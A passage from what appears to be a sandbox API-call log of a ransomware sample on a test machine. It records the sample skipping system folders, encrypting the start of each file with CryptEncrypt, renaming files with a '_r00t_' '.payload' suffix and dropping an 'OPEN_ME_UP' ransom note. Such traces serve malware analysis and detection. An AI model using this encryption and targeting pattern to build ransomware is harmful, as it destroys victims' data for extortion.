lpNumberOfBytesRead=0x342f7e4*=0x278d, lpOverlapped=0x0) returned 1 [0059.094] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd873, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.094] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x278d, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x278d, lpOverlapped=0x0) returned 1 [0059.094] GetProcessHeap () returned 0x5e0000 [0059.094] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.094] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.095] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.095] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.095] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.095] CloseHandle (hObject=0x438) returned 1 [0059.096] GetProcessHeap () returned 0x5e0000 [0059.096] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.096] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0059.096] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0059.098] GetProcessHeap () returned 0x5e0000 [0059.098] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.098] FindNextFileW (in: hFindFile=0x6065e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x10a82, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.098] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0059.098] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0059.098] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0059.098] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0059.098] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0059.098] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 48 [0059.098] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0059.098] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.098] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0059.098] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.098] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.098] GetTickCount () returned 0x114f35a [0059.098] GetTickCount () returned 0x114f35a [0059.098] GetTickCount () returned 0x114f35a [0059.098] GetTickCount () returned 0x114f35a [0059.098] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.098] GetProcessHeap () returned 0x5e0000 [0059.098] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.099] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.101] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.101] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.101] GetProcessHeap () returned 0x5e0000 [0059.101] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.101] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.101] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.101] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.101] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.101] CloseHandle (hObject=0x438) returned 1 [0059.103] GetProcessHeap () returned 0x5e0000 [0059.103] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.103] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0059.103] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0059.104] GetProcessHeap () returned 0x5e0000 [0059.104] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.104] FindNextFileW (in: hFindFile=0x6065e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.104] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0059.104] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0059.104] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0059.104] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0059.104] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0059.104] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\SetupResources.dll") returned 49 [0059.104] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0059.104] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.104] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0059.104] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1041\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.104] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.104] GetTickCount () returned 0x114f36a [0059.104] GetTickCount () returned 0x114f36a [0059.104] GetTickCount () returned 0x114f36a [0059.104] GetTickCount () returned 0x114f36a [0059.104] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.105] GetProcessHeap () returned 0x5e0000 [0059.105] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.105] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.107] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.107] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.107] GetProcessHeap () returned 0x5e0000 [0059.107] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.107] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.107] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.107] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.108] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.108] CloseHandle (hObject=0x438) returned 1 [0059.109] GetProcessHeap () returned 0x5e0000 [0059.109] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.109] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0059.109] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0059.109] GetProcessHeap () returned 0x5e0000 [0059.109] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.109] FindNextFileW (in: hFindFile=0x6065e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.109] FindClose (in: hFindFile=0x6065e0 | out: hFindFile=0x6065e0) returned 1 [0059.109] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0059.109] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1041\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0059.110] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0059.110] CloseHandle (hObject=0x430) returned 1 [0059.111] GetProcessHeap () returned 0x5e0000 [0059.111] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0059.111] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1042", cAlternateFileName="")) returned 1 [0059.111] lstrcmpiW (lpString1="1042", lpString2="Windows") returned -1 [0059.111] lstrcmpiW (lpString1="1042", lpString2="$Recycle.bin") returned 1 [0059.111] lstrcmpiW (lpString1="1042", lpString2="System Volume Information") returned -1 [0059.111] lstrcmpiW (lpString1="1042", lpString2="Program Files") returned -1 [0059.111] lstrcmpiW (lpString1="1042", lpString2="Program Files (x86)") returned -1 [0059.111] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042") returned 30 [0059.111] lstrcmpW (lpString1="1042", lpString2=".") returned 1 [0059.111] lstrcmpW (lpString1="1042", lpString2="..") returned 1 [0059.111] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1042", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0059.111] GetProcessHeap () returned 0x5e0000 [0059.111] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0059.111] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\*") returned 32 [0059.111] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606460 [0059.111] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0059.111] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0059.111] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0059.111] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0059.111] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0059.111] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\.") returned 32 [0059.111] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.111] FindNextFileW (in: hFindFile=0x606460, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0059.112] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0059.112] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0059.112] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0059.112] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0059.112] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0059.112] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\..") returned 33 [0059.112] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.112] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.112] FindNextFileW (in: hFindFile=0x606460, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x318f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.112] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0059.112] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0059.112] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0059.112] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0059.112] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0059.112] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 39 [0059.112] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0059.112] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.112] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0059.112] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.112] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.112] GetTickCount () returned 0x114f36a [0059.112] GetTickCount () returned 0x114f36a [0059.112] GetTickCount () returned 0x114f36a [0059.112] GetTickCount () returned 0x114f36a [0059.112] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.112] GetProcessHeap () returned 0x5e0000 [0059.112] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.113] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.166] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.166] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.166] GetProcessHeap () returned 0x5e0000 [0059.166] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.166] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.166] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.166] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.167] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.167] CloseHandle (hObject=0x438) returned 1 [0059.168] GetProcessHeap () returned 0x5e0000 [0059.168] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.168] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0059.169] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0059.171] GetProcessHeap () returned 0x5e0000 [0059.171] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.171] FindNextFileW (in: hFindFile=0x606460, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xfed6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.171] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0059.171] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0059.171] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0059.171] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0059.171] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0059.171] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 48 [0059.171] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0059.171] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.171] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0059.171] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.172] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.172] GetTickCount () returned 0x114f3a8 [0059.172] GetTickCount () returned 0x114f3a8 [0059.172] GetTickCount () returned 0x114f3a8 [0059.172] GetTickCount () returned 0x114f3a8 [0059.172] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.172] GetProcessHeap () returned 0x5e0000 [0059.173] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, 